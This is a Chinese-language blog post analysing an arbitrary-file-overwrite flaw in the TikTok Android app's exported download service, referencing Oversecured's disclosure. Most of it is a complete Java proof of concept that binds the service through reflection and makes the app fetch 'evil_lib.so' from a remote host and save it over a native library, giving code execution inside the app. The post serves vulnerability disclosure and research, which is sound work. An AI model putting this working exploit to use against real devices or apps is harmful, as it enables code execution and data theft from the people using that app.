Steven's BlogAppearance
这个漏洞完全可以认为是设计api的时候完全没有考虑安全. 直接暴露出来一个可以下载并修改任意文件的API.
漏洞描述
com.ss.android.socialbase.downloader.downloader.IndependentProcessDownloadService是一个导出的服务,它返回了一个binder
java
if (this.downloadServiceHandler != null) {
return this.downloadServiceHandler.onBind(intent);
}
也就是com/ss/android/socialbase/downloader/downloader/DownloadService.java,它提供了一个TryDownload接口,该接口能够让外部指定一个下载的URL以及文件名和下载后存储的位置. 并且没有额外的校验,我们因此可以直接直接覆盖App的任意文件.
POC
这里稍微麻烦一点的地方在于我们要用反射方式来调用这个TryDownload,否则要自己想法构建这个AIDL文件. 很直观,就是bind到这个Service然后调用这个接口即可. 之所以看起来很麻烦就是因为处处要用反射.
java
static final String url = "https://redacted.s3.amazonaws.com/evil_lib.so";
static final String path = "/data/user/0/com.zhiliaoapp.musically/app_lib/";
static final String name = "libuserinfo.so";
private ServiceConnection mServiceConnection = new ServiceConnection() {
public void onServiceConnected(ComponentName cName, IBinder service) {
processBinder(service);
}
public void onServiceDisconnected(ComponentName cName) {
}
};
public static ClassLoader getForeignClassLoader(Context context, String str) throws Exception {
return context.createPackageContext(str, Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY)
.getClassLoader();
}
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Intent intent = new Intent("com.ss.android.socialbase.downloader.remote");
intent.setClassName("com.zhiliaoapp.musically", "com.ss.android.socialbase.downloader.downloader.IndependentProcessDownloadService");
bindService(intent, mServiceConnection, BIND_AUTO_CREATE);
}
private void processBinder(IBinder binder) {
try {
ClassLoader cl = getForeignClassLoader(this, "com.zhiliaoapp.musically");
Object handler = cl.loadClass("com.ss.android.socialbase.downloader.downloader.i$a")
.getMethod("asInterface", IBinder.class)
.invoke(null, binder);
Object payload = getBinder(cl);
cl.loadClass("com.ss.android.socialbase.downloader.downloader.i")
.getMethod("tryDownload", cl.loadClass("com.ss.android.socialbase.downloader.model.a"))
.invoke(handler, payload);
}
catch (Throwable th) {
throw new RuntimeException(th);
}
}
private Object getBinder(ClassLoader cl) throws Throwable {
Class utilsClass = cl.loadClass("com.ss.android.socialbase.downloader.utils.g");
Class taskClass = cl.loadClass("com.ss.android.socialbase.downloader.model.DownloadTask");
return utilsClass.getDeclaredMethod("convertDownloadTaskToAidl", taskClass)
.invoke(null, getDownloadTask(taskClass, cl));
}
private Object getDownloadTask(Class taskClass, ClassLoader cl) throws Throwable {
Class infoClass = cl.loadClass("com.ss.android.socialbase.downloader.model.DownloadInfo");
Object info = getDownloadInfo(infoClass, cl);
return taskClass.getDeclaredConstructor(infoClass).newInstance(info);
}
private Object getDownloadInfo(Class infoClass, ClassLoader cl) throws Throwable {
Object info = infoClass.newInstance();
Field field;
field = infoClass.getDeclaredField("url");
field.setAccessible(true);
field.set(info, url);
field = infoClass.getDeclaredField("savePath");
field.setAccessible(true);
field.set(info, path);
field = infoClass.getDeclaredField("name");
field.setAccessible(true);
field.set(info, name);
field = infoClass.getDeclaredField("enqueueType");
field.setAccessible(true);
field.set(info, cl.loadClass("com.ss.android.socialbase.downloader.constants.EnqueueType").getEnumConstants()[1]);
return info;
}
参考文档: Oversecured detects dangerous vulnerabilities in the TikTok Android app